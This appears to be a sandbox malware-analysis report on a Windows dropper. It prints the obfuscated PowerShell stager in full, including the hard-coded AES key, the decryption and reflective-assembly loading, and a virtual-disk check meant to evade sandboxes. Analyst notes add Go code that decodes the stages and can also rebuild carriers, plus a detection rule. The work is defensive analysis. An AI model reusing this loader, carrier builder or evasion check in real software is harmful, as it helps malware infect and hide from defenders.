[blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: XgKnAQpuPM.exe Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF776D11D10
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00007FF776D115F4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs .Net Code: _F6A9_24CA_2622_EF60_FFFD contains sample name check
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 3208 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 6690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF776D12034
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00007FF776D16710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Amcache.hve.10.dr Binary or memory string: VMware
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.10.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF776D11D10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18A1E SetUnhandledExceptionFilter, 0_2_00007FF776D18A1E
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF776D18714

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5840 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 5840 1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
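Analyst note, added to this report and not part of the sandbox output: the echoed PowerShell above is a three-step loader. It reads vclib.bat, takes the first line beginning with ':: ' (a comment to cmd.exe, so the batch file itself runs normally), splits that line on '\' into two base64 blobs, and for each blob runs [Convert]::FromBase64String, AES-CBC decryption (FpxON, with the key and IV hard-coded in the command line and PKCS7 padding), GZip decompression (ogptr), then [Reflection.Assembly]::Load and EntryPoint.Invoke (VcYYT) with a single empty-string argument. The .NET type names are reassembled at run time with .Replace('blck', '') so that neither the command line nor the script text contains them in plain form. The Go program below was written for this note, uses only the standard library, and reproduces the decoding chain so both assemblies can be recovered for static analysis without executing them. The key and IV are the ones from the command line; the sample carrier and the two "MZ ..." payloads are constructed stand-ins; and the carrier layout (one ':: ' line, blobs separated by '\') is inferred from the script, since no vclib.bat is reproduced in this report.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// AES-256-CBC key and IV exactly as hard-coded in the stager on this page.
var (
	stagerKey, _ = base64.StdEncoding.DecodeString("j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU=")
	stagerIV, _  = base64.StdEncoding.DecodeString("C7Dlt1nshFAIyjxeP0iXIQ==")
	stagerAES, _ = aes.NewCipher(stagerKey)
)

// decryptStage mirrors FpxON: AES-CBC, fixed key/IV, PKCS#7 padding verified.
func decryptStage(ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not block aligned", len(ct))
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(stagerAES, stagerIV).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("bad PKCS#7 padding: wrong key/IV or corrupt blob")
	}
	return pt[:len(pt)-n], nil
}

// carrierBlobs splits the first ":: " line (a cmd.exe comment, so the batch still runs) on '\', which never occurs in base64.
func carrierBlobs(bat string) ([]string, error) {
	for _, line := range strings.Split(bat, "\n") {
		if line = strings.TrimRight(line, "\r"); strings.HasPrefix(line, ":: ") {
			return strings.Split(line[3:], `\`), nil
		}
	}
	return nil, fmt.Errorf("no ':: ' carrier line in batch file")
}

// DecodeStages returns the plaintext assemblies in the order the stager would
// Assembly.Load and invoke them; it deliberately stops before loading anything.
func DecodeStages(bat string) ([][]byte, error) {
	blobs, err := carrierBlobs(bat)
	if err != nil {
		return nil, err
	}
	var stages [][]byte
	for i, b := range blobs {
		buf, err := base64.StdEncoding.DecodeString(b) // [Convert]::FromBase64String
		if err == nil {
			buf, err = decryptStage(buf) // FpxON
		}
		if err == nil { // ogptr: GZipStream(Decompress) drained into a MemoryStream
			var zr *gzip.Reader
			if zr, err = gzip.NewReader(bytes.NewReader(buf)); err == nil {
				buf, err = io.ReadAll(zr)
			}
		}
		if err != nil {
			return nil, fmt.Errorf("blob %d: %w", i, err)
		}
		stages = append(stages, buf)
	}
	return stages, nil
}

// BuildSampleBat runs the inverse chain (gzip -> PKCS#7 -> AES-CBC -> base64) to fabricate an offline test carrier.
func BuildSampleBat(stages [][]byte) string {
	var blobs []string
	for _, s := range stages {
		var zb bytes.Buffer
		zw := gzip.NewWriter(&zb)
		zw.Write(s)
		zw.Close()
		pad := aes.BlockSize - zb.Len()%aes.BlockSize
		padded := append(zb.Bytes(), bytes.Repeat([]byte{byte(pad)}, pad)...)
		ct := make([]byte, len(padded))
		cipher.NewCBCEncrypter(stagerAES, stagerIV).CryptBlocks(ct, padded)
		blobs = append(blobs, base64.StdEncoding.EncodeToString(ct))
	}
	return "@echo off\r\n:: " + strings.Join(blobs, `\`) + "\r\nexit /b\r\n"
}

func main() {
	// Constructed stand-ins for the two .NET assemblies; not real payloads.
	stages, err := DecodeStages(BuildSampleBat([][]byte{[]byte("MZ constructed stage 0"), []byte("MZ constructed stage 1")}))
	if err != nil {
		panic(err)
	}
	for i, s := range stages {
		fmt.Printf("stage %d: %d bytes %q\n", i, len(s), s)
	}
}
```

To use it on a real carrier, read vclib.bat and pass its contents to DecodeStages; blob 0 is the assembly the stager invokes first. A padding error from decryptStage almost always means the key or IV differs between samples, which is worth checking because this family embeds the AES key in the stager rather than deriving it, so a related sample may only differ in those two base64 constants.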
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh = 
'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] (''));
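Detection note, added here and not part of the sandbox output: the chain above is a hardware-fingerprint sandbox check followed by the stager launch. wmic diskdrive get Model is piped to findstr for three disk model strings (QEMU HARDDISK is the default model string of a QEMU/KVM virtual disk; the other two are models the author associates with analysis systems), and under the same parent cmd.exe echoes the obfuscated script into powershell.exe -WindowStyle Hidden. The Go program below was written for this note and is not part of the report; it runs a sibling-process correlation over a constructed set of process-creation events modelled on this report's chain. PIDs, parent PIDs, the field names and the abbreviated echo command line are assumptions, and a lone wmic query under another parent is included as a benign control. It is offline triage logic, not a production rule.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a minimal process-creation record. Field names are an assumption;
// map them from whatever Sysmon/EDR export is at hand.
type ProcEvent struct {
	PID, PPID int
	Image     string
	CmdLine   string
}

// Disk model strings the stager greps for (lower-cased for matching).
var sandboxDiskMarkers = []string{"dady harddisk", "qemu harddisk", "wds100t2b0a"}

func isImage(e ProcEvent, name string) bool {
	return strings.HasSuffix(strings.ToLower(e.Image), `\`+name)
}

// Triage groups events by parent and reports, per parent, (1) a wmic disk-model
// query alongside a findstr that carries sandbox disk markers and (2) cmd.exe
// echoing an Invoke-Expression/.Replace() script alongside a hidden PowerShell
// host. Each half alone is ambiguous; the pairing under one parent is the signal.
func Triage(events []ProcEvent) []string {
	byParent := map[int][]ProcEvent{}
	var order []int // deterministic output order: parents as first seen
	for _, e := range events {
		if _, seen := byParent[e.PPID]; !seen {
			order = append(order, e.PPID)
		}
		byParent[e.PPID] = append(byParent[e.PPID], e)
	}
	var findings []string
	for _, ppid := range order {
		var wmicModel, markerGrep, echoedStager, hiddenHost bool
		for _, e := range byParent[ppid] {
			c := strings.ToLower(e.CmdLine)
			switch {
			case isImage(e, "wmic.exe") && strings.Contains(c, "diskdrive") && strings.Contains(c, "model"):
				wmicModel = true
			case isImage(e, "findstr.exe"):
				for _, m := range sandboxDiskMarkers {
					markerGrep = markerGrep || strings.Contains(c, m)
				}
			case isImage(e, "cmd.exe") && strings.Contains(c, "/c echo") &&
				strings.Contains(c, "invoke-expression") && strings.Contains(c, ".replace("):
				echoedStager = true
			case isImage(e, "powershell.exe") && strings.Contains(c, "-windowstyle hidden"):
				hiddenHost = true
			}
		}
		if wmicModel && markerGrep {
			findings = append(findings, fmt.Sprintf("ppid %d: disk-model sandbox probe (wmic diskdrive | findstr)", ppid))
		}
		if echoedStager && hiddenHost {
			findings = append(findings, fmt.Sprintf("ppid %d: obfuscated stager echoed into hidden powershell", ppid))
		}
	}
	return findings
}

// SampleEvents is a constructed event set modelled on this report's chain; PIDs
// and the abbreviated echo command line are made up. The last event is a lone
// wmic query under a different parent, the benign control.
func SampleEvents() []ProcEvent {
	return []ProcEvent{
		{101, 100, `C:\Windows\System32\wbem\WMIC.exe`, `wmic diskdrive get Model`},
		{102, 100, `C:\Windows\System32\findstr.exe`, `findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"`},
		{103, 100, `C:\Windows\System32\cmd.exe`, `cmd.exe /c echo function FpxON($kXGHT){ ... Invoke-Expression '$bJDne=New-Object blckSblckyblcks...'.Replace('blck', '') ...`},
		{104, 100, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe -WindowStyle Hidden`},
		{201, 200, `C:\Windows\System32\wbem\WMIC.exe`, `wmic diskdrive get Model`},
	}
}

func main() {
	for _, f := range Triage(SampleEvents()) {
		fmt.Println(f)
	}
}
```

The parent-scoped pairing is what keeps the false-positive rate down: administrators and inventory agents run wmic diskdrive get Model on its own, and hidden PowerShell windows are common in logon scripts, but a findstr for QEMU HARDDISK next to that query, or an echoed Invoke-Expression script with .Replace() reassembly next to a hidden host, has no ordinary reason to exist.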
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle, 0_2_00007FF776D11258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
